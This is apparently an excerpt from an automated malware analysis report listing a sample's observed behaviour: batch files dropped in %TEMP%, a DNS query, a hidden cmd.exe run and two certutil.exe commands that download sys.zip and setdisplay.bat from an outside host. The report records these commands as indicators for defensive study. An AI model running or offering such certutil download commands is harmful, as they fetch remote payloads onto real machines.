Technical Information
- %TEMP%\aabf.tmp\aac0.tmp\aac1.bat
- %TEMP%\aabf.tmp\aac0.tmp\aac1.bat
- DNS ASK ph.#10.mx
- '<SYSTEM32>\cmd.exe' /c "%TEMP%\AABF.tmp\AAC0.tmp\AAC1.bat <Full path to file>"' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c "%TEMP%\AABF.tmp\AAC0.tmp\AAC1.bat <Full path to file>"
- '<SYSTEM32>\certutil.exe' -urlcache -split -f "http://ph.#10.mx/i/sys.zip" E:\RadzSystem\sys.zip
- '<SYSTEM32>\certutil.exe' -urlcache -split -f "http://ph.#10.mx/i/setdisplay.bat" E:\RadzSystem\setdisplay.bat